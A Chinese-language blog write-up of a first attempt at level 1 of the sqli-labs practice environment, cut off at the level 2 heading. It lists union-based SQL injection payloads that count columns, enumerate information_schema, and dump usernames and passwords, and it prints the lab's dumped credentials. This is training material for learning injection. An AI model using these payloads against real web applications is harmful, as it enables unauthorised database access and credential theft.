sqlli-lab

前言

第一次玩sqli-lab,这里就记录一下游玩情况

第一关

1
?id=1' order by 1%23

得到正确的回显

1
?id=1' order by 4

得到错误的回显

判断只有三个字段,直接常规操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
?id=-1' union select 1,2,3%23

?id=-1' union select 1,database(),3%23

//获得数据库名:security

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' limit 0,1%23

//获得表名:emails、referers、uagents、users

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'
limit 0,1%23

//获得列名:id、username、password

?id=-1'union select 1,group_concat(username,password),3 from security.users %23

//获得数据
DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4

不过这个数据好乱,百度了一下发现大佬们注入都是可视化的

exp:union SELECT 1,2,(select group_concat(username,0x3a,password) from users)%23

果然我就是个菜鸡。

第二关